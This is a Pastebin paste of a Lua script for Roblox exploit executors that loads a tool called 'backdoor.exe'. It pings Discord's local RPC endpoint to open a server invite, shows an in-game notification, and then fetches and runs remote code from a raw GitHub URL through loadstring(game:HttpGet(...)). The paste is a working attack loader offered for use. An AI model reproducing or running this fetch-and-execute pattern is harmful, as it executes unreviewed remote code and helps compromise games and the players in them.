Advertisement
A_GUES

Fix Backdoor.exe script

Jul 20th, 2023
2,040
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.07 KB | None | 1 0
  1. local httpService = game:GetService("HttpService");
  2.  
  3. local invCode = "xJHCqm84cW";
  4. local httpRequest = (syn and syn.request) or http_request;
  5.  
  6. local function launchDiscord()
  7. if not httpRequest then
  8.         warn("Exploit not supported. No HTTP found.")
  9.         return
  10.     end
  11.  
  12. httpRequest({
  13. Url = "http://127.0.0.1:6463/rpc?v=1",
  14. Method = "POST",
  15.  
  16. Headers = {
  17. ['Content-Type'] = 'application/json',
  18. Origin = 'https://discord.com'
  19. },
  20.  
  21. Body = httpService:JSONEncode({
  22. cmd = 'INVITE_BROWSER',
  23. nonce = httpService:GenerateGUID(false),
  24. args = {code = invCode}
  25. })
  26. })
  27. end;
  28.  
  29. local NotificationBindable = Instance.new("BindableFunction")
  30. NotificationBindable.OnInvoke = launchDiscord
  31.  
  32. game:GetService("StarterGui"):SetCore(
  33. "SendNotification",
  34. {
  35. Title = "backdoor.exe",
  36. Duration = 5,
  37. Text = "Loading lastest version!\n\nJoin our Discord for games, scripts and more",
  38. Button1 = "Join Discord!",
  39. Callback = NotificationBindable
  40. }
  41. )
  42.  
  43. if httpRequest then
  44.     loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua"))();
  45. end
  46.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement